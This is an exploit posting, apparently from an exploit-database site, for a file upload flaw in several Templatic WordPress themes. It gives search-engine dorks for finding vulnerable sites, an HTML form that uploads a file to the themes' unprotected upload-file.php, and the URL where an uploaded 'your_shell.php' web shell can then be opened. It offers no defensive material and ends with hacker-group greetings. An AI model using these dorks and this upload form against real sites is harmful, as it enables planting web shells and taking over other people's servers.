Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF

#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/

CSRF File Upload Vulnerability

Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">

<br>
</br>
<input name="uploadfile[]" type="file" />

<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access :
http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php

Note :
Script CSRF equate with dork you use

########################################
#Greetz : SANJUNGAN JIWA , All Indonesian H4xor
#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,
########################################

#  0day.today [2018-04-09]  #